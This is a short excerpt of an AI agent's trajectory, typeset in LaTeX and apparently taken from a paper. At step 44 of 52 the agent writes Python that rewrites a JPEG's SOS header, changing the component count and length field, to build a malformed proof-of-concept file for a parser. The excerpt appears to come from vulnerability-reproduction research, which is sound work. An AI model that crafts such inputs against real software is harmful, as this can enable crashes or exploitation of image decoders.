\begin{MintedVerbatim}[commandchars=\\\{\}]
[Step: 44/52]
\PYGZdl{} run\PYGZus{}ipython ```python
\PYGZsh{} Try a more aggressive corruption: set the number of components in SOS to [...]
with open(\PYGZsq{}/workspace/poc.jpg\PYGZsq{}, \PYGZsq{}rb\PYGZsq{}) as f:
    data = bytearray(f.read())

sos = find\PYGZus{}sos(data)
if sos == \PYGZhy{}1:
    raise Exception(\PYGZsq{}SOS marker not found\PYGZsq{})

\PYGZsh{} Set number of components to 2
length = struct.unpack(\PYGZsq{}\PYGZgt{}H\PYGZsq{}, data[sos+2:sos+4])[0]
data[sos+4] = 2
\PYGZsh{} Remove the next 2 bytes (component spec for 1 component)
del data[sos+7:sos+9]
\PYGZsh{} Fix the length field (was 0x0C for 3 components, should be 0x0A for 2)
data[sos+2:sos+4] = struct.pack(\PYGZsq{}\PYGZgt{}H\PYGZsq{}, length \PYGZhy{} 2)

[...]
```
Aggressively corrupted JPEG written to /workspace/poc\PYGZus{}badscan.jpg
[Jupyter current working directory: /workspace]
[Jupyter Python interpreter: /openhands/poetry/openhands\PYGZhy{}ai\PYGZhy{}5O4\PYGZus{}aCHf\PYGZhy{}py3.12/bin/python]
\end{MintedVerbatim}
